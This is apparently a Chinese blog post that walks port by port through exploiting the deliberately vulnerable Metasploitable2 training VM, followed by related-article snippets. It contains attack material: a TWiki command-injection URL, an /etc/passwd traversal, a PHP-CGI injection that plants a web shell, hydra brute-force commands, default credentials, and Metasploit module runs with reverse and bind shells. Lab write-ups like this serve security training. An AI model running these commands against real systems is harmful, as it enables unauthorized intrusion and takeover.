metasploitable2靶场漏洞总结(部分)

原创 已于 2024-10-14 14:59:44 修改 · 3.8k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #php #ssh #metasploitable #安全

于 2022-08-17 19:45:26 首次发布

metasploitable2

端口

使用nmap扫描可得:
在这里插入图片描述

21vsftpd2.3.4笑脸后门漏洞

程序的后门代码绑定的侦听端口是 6200。
通过ftp进行连接 在账号后加上:),密码随意,这时会登录失败,再次扫描6200端口,会发现6200端口已经打开,最后用nc连接6200端口就能执行命令了。也可以使用msf搜索vsftpd,利用msf里的脚本攻击。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

22弱口令

hydra -L logins.txt -P pws.txt -M targets.txt ssh 或者 使用msf里的ssh_enumusers 来爆破(msfadmin/msfadmin)。

23弱口令

msfadmin/msfadmin

25 CNNVD-200111-004

低危,产生超多SMTP错误导致服务拒绝(内存耗尽)。

53 ISC BIND

80 http

  1. twiki漏洞
    twiki版本为 01
    http://192.168.230.130/twiki/bin/view/Main/TWikiUsers?rev=2%20|whoami||echo
    在这里插入图片描述
    当twiki版本为4.0.x时,存在任意文件读取
    http://example.com/bin/viewfile/TWiki/TWikiDocGraphics?rev=1;filename=…/…/…/…/…/etc/passwd
  2. phpmyadmin漏洞
    版本:3.1.1
    爆破目录
    在这里插入图片描述
    扫到setup文件,
    登录界面重放操作
    修改url为
/phpmyadmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input

表示修改配置文件中的参数all_url_include(打开引用文件功能)和auto_prepend_file(附加文件)
passthru为执行命令
可以使用echo “<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>” > /var/www/cmd.php 命令来添加shell
反弹shell操作
在这里插入图片描述

  1. cgi参数注入
    server API 是CGI方式运行的,这个方式在PHP存在漏洞-Cgi参数注入
    use exploit/multi/http/php_cgi_arg_injection
  2. webdav
    https://blog.youkuaiyun.com/qq_41861526/article/details/103414741

111 rpcbind

use auxiliary/scanner/misc/sunrpc_portmapper
search sunrpc
在这里插入图片描述

139/445 smb

use exploit/multi/samba/usermap_script
最后smbclient -L //192.168.206.216获取共享目录
search smb (大部分为远程执行漏洞)
可能存在共享弱口令:netbios-ssn://192.168.230.130 (及使用IPC$连接,尝试连接未成功
用户名/密码:User/User

512 rexec(远程计算机上运行命令)爆破

hydra爆破

1099 java-rmi

CVE-2011-3556:
use exploit/multi/misc/java_rmi_server
set payload java/meterpreter/reverse_tcp
set RHOSTS xxx
run
在这里插入图片描述
CVE-2017-3241 rmi反序列化漏洞
存在有缺陷的第三方库如commons-collections(主要缺陷为第三方库)

1524 bind_shell

metasploitable2本身有shell,可以直接连接
nc 192.168.230.130 1524

2049 nfs

nfs有信息泄露漏洞

showmount -e 192.168.230.130 2049

但是靶场好像没有

2121 ftp

  1. 超级弱口令扫描出来存在弱口令
    在这里插入图片描述
  2. vsftpd后门漏洞
    search vsftpd
    use exploit/unix/ftp/vsftpd_234_backdoor

3306 mysql

用户名root 密码为空

3632 distccd

use exploit/unix/misc/distcc_exec
show payloads
 set payload cmd/unix/bind_perl
run

在这里插入图片描述

5432 postgresql

爆破

5900 vnc

爆破,密码为password

6667/6697 irc

search rcd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set rhosts 192.168.206.216
run

8009 ajp

poc下载:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

8180 tomcat示例漏洞

当tomcat默认页面manager/html需要输入账号和密码时,metasploit 中有扫描器tomcat_mgr_login获取账号密码。用账号密码登录后,有上传war(压缩包rar改名为war)的地方,上传成功后,在url根目录添加上war包名/压缩包里的文件?cmd=whoami
在这里插入图片描述
也可以使用jar -cvf xx.war xx.jsp 生成war包,上传后访问 http://127.0.0.1:8080/war 包名(无后缀) / 包名内文件名
在这里插入图片描述

8787 drb

search drb
use use exploit/linux/misc/drb_remote_codeexec
set rhosts 192.168.206.216
run

漏洞验证】Metasploitable2靶机漏洞复现
weixin_43486390的博客
12-10 3092
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Bind Shell Backdoor Detection4、UnrealIRCd Backdoor(ircd) Metasploitable2靶机漏洞复现 环境IP:192.16...
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1191
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 5425
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
Metasploitable: 2靶场渗透
最新发布
sucker的博客
06-10 720
渗透测试价值:Metasploitable 等靶机仍广泛用于教学,演示 从信息收集到提权 的完整链。此漏洞虽古老,但仍是理解后门漏洞原理的经典教材,实际环境中需确保无遗留 2.3.4 版本服务。4,分析目标系统的第一个暴露面,也是我们的攻击面,21端口存在的tp服务。漏洞本质:开发者故意植入或代码被篡改的后门,通过用户名中的特殊字符。后门漏洞 (CVE-2011-2523),允许未授权命令执行。6,尝试80端口的http服务漏洞利用getshell。Metasploit存在漏洞利用的模块,使用之。
Metasploitable2 靶机漏洞(下)
Fly_鹏程万里
05-02 5087
11、Root用户弱口令漏洞SSH爆破) 安全组织索引 CVE:无 OSVDB:无 BID:无 原理 靶机root用户存在弱口令漏洞,在使用指南里并没有指出。 影响系统/软件 Linux 使用工具 Metasploit 利用步骤 1.输入nmap –sV -O 192.168.160.131 查看SSh端口是否开启 开启metasploit framework 框...
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7902
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 2402
Metasploitable2靶机漏洞发现与渗透测试
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)_msf6怎么用
2401_84302507的博客
05-17 744
这个模块有个吐血的配置,导致我重新搭建了环境(搞了两天),还是错误,最后发现,wordpress后面必须有/,后面那个form_path是从wordpress后台的page页面获得的。按照info -d说明,除可见的参数外,添加一个扩展的参数,set FORCE_VBS ture 模块自动的行为是通过命令执行在靶机下载一个BASE64文件,并使用VBS解码并创建的.exe文件,运行并自动将木马迁移到service.exe同进程中。实际是没有启动的,bundler版本不对,排错后还是报其他错。
小白学KALI:轻松搭建Metasploitable2网站漏洞靶场
Kali与编程
09-08 286
Metasploitable2 是基于 Ubuntu 操作系统构建的,它故意配置了大量已知的安全漏洞,这次我就教会你如何搭建好它。保姆级教程,快领走!有学员问我,如何合法进行渗透测试,总不能拿真实的网站来练手,一来成功率不高,二来容易被请喝茶。其实很简单,自己搭建实验靶场,尽情把完,不犯法!2、在VMware打开VMX文件。4、ifconfig查看靶场IP。3、输入用户名和密码。
Metaspoitable2安全测试靶机の测试心得()
web_kids的博客
06-11 1028
无聊写的
靶机渗透()——metasploitable2
qq_45751902的博客
04-29 8242
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable2靶机之第七篇--Distcc后门漏洞
千寻的博客
04-02 2245
文章目录环境原理漏洞利用第一步 ,启动metasploit第二步选择漏洞库第三步 设置参数,开始攻击第四步 利用成功,执行验证摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 Distcc用于大量代码在网络服务器上的分布式编译, 但是如果配置不严格,容易被滥用执行命令, 该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制 漏洞利用 第一步
Metasploitable2中FTP漏洞
m0_56368726的博客
11-04 417
1、查看靶机的ip Metasploitable2默认的用户名是 :msfadmin 密码是: msfadmin 登陆之后使用ip addr查看ip地址 靶机的ip为192.168.43.253
metasploitable2靶场渗透
weixin_45349299的博客
02-13 529
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)
richardjung的专栏
01-22 2794
metasploitable3靶场使用msf6实操
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 3万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
Metasploitable2靶机学习
m0_46371267的博客
10-13 4503
Metasploitable2靶机渗透 什么是Metasploitable2Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 使用步骤 下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为:msfadmin 下载下来后直接双击 网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
构建Metasploitable 靶场环境
cmcaimao的博客
04-17 2146
原文地址:https://github.com/rapid7/metasploitable3 Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。它旨在用作测试metasploit漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。有关更多详细信息,请参见复制。 快速开始 要使用https://app.vag...
metasploitable笑脸漏洞
07-25
回答: metasploitable2中的笑脸漏洞是指vsftpd2.3.4版本中的一个后门漏洞。该漏洞允许攻击者通过使用弱口令(例如23弱口令)来获取对目标系统的访问权限。\[2\]如果攻击者成功利用该漏洞,他们可以执行远程命令或者获取敏感信息。为了利用这个漏洞,可以使用metasploit框架中的exploit/linux/postgres/postgres_payload模块。\[3\]该模块可以帮助攻击者利用该漏洞来获取对目标系统的控制权。 #### 引用[.reference_title] - *1* *2* [metasploitable2靶场漏洞总结(部分)](https://blog.youkuaiyun.com/qq_42552091/article/details/126332010)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Metasploitable2靶机漏洞渗透测试](https://blog.youkuaiyun.com/xyc_0/article/details/129459130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值